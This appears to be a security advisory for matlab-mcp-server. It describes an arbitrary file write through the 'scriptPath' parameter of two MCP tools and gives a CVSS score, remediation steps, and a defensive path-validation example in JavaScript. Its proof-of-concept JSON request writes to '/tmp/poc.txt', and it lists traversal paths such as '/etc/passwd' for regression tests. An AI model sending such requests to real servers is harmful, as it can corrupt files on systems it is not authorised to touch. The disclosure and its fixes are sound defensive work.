# Vulnerability Summary: matlab-mcp-server Arbitrary File Write Vulnerability

## Overview

* **Vulnerability Name**: Arbitrary File Write Vulnerability in matlab-mcp-server
* **CWE ID**: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
* **Vulnerability Type**: Arbitrary File Write (CWE-22)
* **Discoverer**: Bruce2in (Brucelgs)
* **Report Date**: April 12, 2026
* **Affected Component**: `src/index.ts`
* **Root Cause**: The `generate_matlab_code` and `execute_matlab_code` tools accept a user-provided `scriptPath` parameter and use it directly as the file system write target, without restricting it to a safe directory or checking for path traversal.

## Impact Scope

* **Affected Version**: Commit `aba88e6e9f5f3f775e8828029f7f6dd6d9512ca` confirmed affected.
* **Attack Prerequisites**:
  * The attacker can invoke the exposed MCP tools of the affected matlab-mcp-server instance.
  * The `generate_matlab_code` or `execute_matlab_code` tools are reachable by the attacker.
  * The server process has file system write permissions for the target path chosen by the attacker.
  * No valid authentication, authorization, sandboxing, or path restrictions are required.
  * A MATLAB installation is not needed to reproduce the `generate_matlab_code` write primitive.
* **Security Impact**:
  * **Confidentiality**: Low (demonstrates a write primitive, not direct read).
  * **Integrity**: High (attacker-controlled content can be written to any writable file system location).
  * **Availability**: High (attacker-controlled writes can corrupt application files, configuration files, startup scripts, or user data).
  * **Scope**: Unchanged.
* **Suggested CVSS v3.1**:
  * Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H`
  * Base Score: 9.4 (Critical)

## Remediation

1. **Eliminate** the documented data flow from request to arbitrary file write.
2. **Resolve** `scriptPath` with `path.resolve` relative to a trusted base directory, then compare the resolved path against that base directory with an explicit, directory-aware boundary check.
3. **Reject** absolute paths unless they are explicitly allowed and remain within the permitted base directory.
4. **Remove** the `scriptPath` parameter if arbitrary output paths are unnecessary, and generate a server-controlled filename located in a safe directory.
5. **Add** regression tests proving that paths such as `/tmp/poc.txt`, `/etc/passwd`, and `../../outside-workspace.txt` cannot be written via `generate_matlab_code` or `execute_matlab_code`.
6. **Publish** a maintainer security advisory once the patch is released.

## Proof-of-Concept (POC) Code

**1. Start the Affected Server (MCP Inspector)**

```bash
cd matlab-mcp-server
npm install
npm run build
npx @modelcontextprotocol/inspector node build/index.js
```

**2. Reproduce Request (Invoke generate_matlab_code Tool)**

```json
{
  "description": "POC_ARBITRARY_FILE_WRITE_TXT",
  "saveScript": true,
  "scriptPath": "/tmp/poc.txt"
}
```

**3. Verification**

```bash
cat /tmp/poc.txt
```

Confirm the file exists and contains:

```
POC_ARBITRARY_FILE_WRITE_TXT
```
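
Remediation steps 2, 3 and 5 shown as an added example, not code from matlab-mcp-server. The names `resolveScriptPath` and `isRejected` and the `BASE_DIR` value are hypothetical and chosen only for illustration.

```javascript
// Added example (not from matlab-mcp-server). BASE_DIR, resolveScriptPath
// and isRejected are hypothetical names chosen for this illustration.
const path = require("node:path");

// Assumption: the only directory the server may write scripts into.
const BASE_DIR = path.resolve("/srv/matlab-mcp/scripts");

// Returns the absolute, validated write target, or throws.
function resolveScriptPath(scriptPath, baseDir = BASE_DIR) {
  if (typeof scriptPath !== "string" || scriptPath.length === 0) {
    throw new Error("scriptPath must be a non-empty string");
  }
  if (scriptPath.includes("\0")) {
    throw new Error("scriptPath contains a NUL byte");
  }
  // Remediation step 3: reject absolute paths outright.
  if (path.isAbsolute(scriptPath)) {
    throw new Error("absolute scriptPath is not allowed");
  }
  // Remediation step 2: resolve against the trusted base directory...
  const resolved = path.resolve(baseDir, scriptPath);
  // ...then compare. path.relative() starts with ".." when the target lies
  // outside baseDir. A plain startsWith(baseDir) check would wrongly accept
  // a sibling such as "/srv/matlab-mcp/scripts-evil".
  const rel = path.relative(baseDir, resolved);
  const escapes =
    rel === "" ||                        // the base directory itself
    rel === ".." ||
    rel.startsWith(".." + path.sep) ||
    path.isAbsolute(rel);                // e.g. another drive on Windows
  if (escapes) {
    throw new Error("scriptPath escapes the permitted directory");
  }
  return resolved;
}

// Helper for regression tests (step 5): true when the path is refused.
function isRejected(scriptPath) {
  try {
    resolveScriptPath(scriptPath);
    return false;
  } catch {
    return true;
  }
}
```

The check is lexical only. If symlinks can exist under the base directory, also compare `fs.realpathSync` of the target's parent directory against the base before writing.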